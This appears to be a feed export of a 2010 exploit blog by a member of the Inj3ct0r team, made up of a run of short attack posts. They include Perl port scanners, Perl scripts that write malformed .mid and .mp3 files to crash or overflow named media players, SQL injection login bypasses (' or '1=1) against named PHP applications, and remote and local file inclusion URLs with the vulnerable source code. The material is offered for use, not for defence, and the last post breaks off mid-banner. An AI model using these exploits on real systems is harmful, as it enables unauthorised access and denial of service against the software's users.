tag:blogger.com,1999:blog-61203520521683660802011-07-30T23:42:21.041-07:00r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.comBlogger701100tag:blogger.com,1999:blog-6120352052168366080.post-81509253231166351742010-03-05T06:27:00.002-08:002010-03-05T06:28:01.488-08:00#!/usr/bin/perl<br /><br /># Simple Open Port Scanner 2<br /><br /># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />use IO::Socket;<br /><br />if(@ARGV != 3){<br /> print "cr4wl3r\' ports scanner\nUsage: $0 [min port] [max port] [host]\n";<br /> exit 1;<br />}<br />if($ARGV[0] > $ARGV[1]){<br /> print "Error: min port is higher then max port\n";<br /> exit 1;<br />}<br />for($i = $ARGV[0]; $i <= $ARGV[1]; ++$i){<br /> $host = IO::Socket::INET->new(PeerAddr=>$ARGV[2],PeerPort=>$i,proto=>'tcp',Timeout=>1) and print "Port $i is open\n";<br />}<br />exit;<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8150925323116635174?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-46951090412576163852010-03-05T06:27:00.001-08:002010-03-05T06:27:38.000-08:00#!/usr/bin/perl<br /><br /># Simple Open Port Scanner<br /><br /># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br /># Usage: port.pl [host]<br /><br />use IO::Socket;<br /><br /><br />for($i = 0; $i <= 65535; ++$i){<br />$host = IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$i,proto=>'tcp',Timeout=>1)<br />and print "<-> Port $i Open\n";<br />}<br />exit;<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4695109041257616385?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-82022133565902871992010-03-04T10:29:00.004-08:002010-03-04T10:30:19.854-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";<br />###################################################################<br />open(file, "> sploit.mid");<br />print (file $buff);<br />###################################################################<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8202213356590287199?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-84208252853024939732010-03-04T10:29:00.003-08:002010-03-04T10:29:46.435-08:00#!/usr/bin/perl<br /> <br /># WinSmMuPl 1.2.5 (.mp3) Local Crash PoC<br /> <br /># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /> <br />#[+] Discovered By: cr4wl3r<br /> <br /> <br />print "#####################################################\n";<br />print "[!] WinSmMuPl 1.2.5 (.mp3) Local Crash PoC\n";<br />print "\n";<br />print "[!] By: cr4wl3r\n";<br />print "#####################################################\n";<br /> <br /> <br />my $boom = "A" x 1337;<br />my $filename = "sploit.mp3";<br />open (FILE,">$filename");<br />print FILE "$boom";<br />print "\nDone!\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8420825285302493973?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-15296335120416987442010-03-04T10:29:00.001-08:002010-03-04T10:29:21.945-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />PoC: http://server/includes/tgpinc.php?DOCUMENT_ROOT=[Shell]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1529633512041698744?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-69289586313572935902010-03-04T10:28:00.003-08:002010-03-04T10:28:58.042-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /># PoC: [path]/login.php<br /> <br /># Username: ' or '1=1<br /># password: ' or '1=1<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6928958631357293590?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-80954762489949821572010-03-04T10:28:00.001-08:002010-03-04T10:28:34.759-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /># Code:<br /> <br />include("ayar.php");<br /> <br />$ids= $_GET["id"];<br /> <br />$yaz= mysql_fetch_array(mysql_query("select * from tarifler where id='$ids'"));<br /> <br />mysql_select_db("yemek");<br /> <br /> mysql_query("SET NAMES ?latin5?");<br /> mysql_query("SET CHARACTER SET latin5"); <br /> <br /> <br />$baslik= $yaz["baslik"];<br /> $resim = $yaz['resim'];<br /> if($resim==""){<br /> $resim= "bos.png";<br /> }<br />$kisa= $yaz["kisa"];<br />$tarif= $yaz["metin"];<br />############################################################<br /># PoC: [path]/oku.php?id=[SQL]<br />############################################################<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8095476248994982157?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-47634393246982376072010-03-04T10:27:00.002-08:002010-03-04T10:28:11.996-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />PoC:<br /> [Project Man_path]/login.php<br /> <br />Username: ' or '1=1<br />password: ' or '1=1<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4763439324698237607?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-89227326957214886412010-03-04T10:27:00.001-08:002010-03-04T10:27:51.501-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />PoC:<br /> [phpcdb_path]/firstvisit.php?lang_global=[LFI]<br /> [phpcdb_path]/newfolder.php?lang_global=[LFI]<br /> [phpcdb_path]/showfolders.php?lang_global=[LFI]<br /> [phpcdb_path]/newlang.php?lang_global=[LFI]<br /> [phpcdb_path]/showinnerfolder.php?lang_global=[LFI]<br /> [phpcdb_path]/writecode.php?lang_global=[LFI]<br /> [phpcdb_path]/showcode.php?lang_global=[LFI]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8922732695721488641?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-24438036116501833912010-03-04T10:26:00.000-08:002010-03-04T10:27:29.141-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />PoC:<br /> [phpRAINCHECK_path]/print_raincheck.php?id=[SQL]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2443803611650183391?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-50820751212807692722010-03-04T10:25:00.000-08:002010-03-04T10:26:20.575-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[RFI Code]<br /> <br /><?php<br /> if (!($_GET['page']))<br /> include('info.php');<br /> else <br /> include $_GET['page'].'.php';<br /> ?><br /> <br />[LFI Code]<br /> <br />include_once('lang/'.$_SESSION['userLang'].'/elisttasks.php');<br />if (!defined('PROMAN'))<br /> pexit ($l['no hack']);<br />##############################################################<br />PoC RFI:<br /> [phpRAINCHECK_path]/_center.php?page=[Shell]<br />##############################################################<br />PoC LFI:<br /> [ProMan_path]/elisttasks.php?_SESSION[userLang]=[LFI]<br /> [ProMan_path]/managepmanagers.php?_SESSION[userLang]=[LFI]<br /> [ProMan_path]/manageusers.php?_SESSION[userLang]=[LFI]<br /> [ProMan_path]/helpfunc.php?_SESSION[userLang]=[LFI]<br /> [ProMan_path]/managegroups.php?_SESSION[userLang]=[LFI]<br /> [ProMan_path]/manageprocess.php?_SESSION[userLang]=[LFI]<br /> [ProMan_path]/manageusersgroups.php?_SESSION[userLang]=[LFI]<br /> <br />others...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5082075121280769272?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-66571870404226779172010-03-04T10:24:00.002-08:002010-03-04T10:25:18.876-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />###########################################################################<br />#if (isset($_POST['admin_name']))<br /># {<br /># $admin_name=$_POST['admin_name'];<br /># $admin_password=$_POST['admin_password'];<br />#<br />#<br /># if(empty($admin_name))<br /># {<br /># $errorMessage=warning." Username is empty!";<br /># }<br /># elseif(empty($admin_password))<br /># {<br /># $errorMessage=warning." Password is empty!";<br /># }<br />#<br />#<br /># else<br /># {<br /># $sql="SELECT *<br /># FROM admin<br /># WHERE admin_name='$admin_name' and admin_password='$admin_password'";<br />#<br />###########################################################################<br /> <br />###############################################<br />PoC: [path]/admin/admin_login.php<br /> <br /> Username: ' or '1=1<br /> password: ' or '1=1<br />###############################################<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6657187040422677917?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-30210433390901168142010-03-04T10:24:00.001-08:002010-03-04T10:24:49.266-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />print "<br />[+]-------------------------------------------------------[+]<br />[+] Chasys Media Player 1.1 (.mid) Local Buffer Overflow [+]<br />[+] By : cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg> [+]<br />[+]-------------------------------------------------------[+]<br />";<br /> <br /> <br />$buff =<br />"\x52\x49\x46\x46\xff\xff\x00\x00\x52\x4d\x49\x44\x64\x64\x64\x64" .<br />"\xf8\xff\xff\xff\x4d\x54\x68\x64\xff\xff\xff\xff\xf8\xff\xff\xf8" .<br />"\xf8\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .<br />"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .<br />"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";<br /> <br />open(file, "> sploit.mid");<br />print (file $buff);<br />print "\n\n[+] Done...!!!\n<br />[+] Open with Chasys Media Player\n<br />[+] Coded by cr4wl3r\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3021043339090116814?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-2942607089247845882010-03-04T10:23:00.002-08:002010-03-04T10:24:22.753-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ 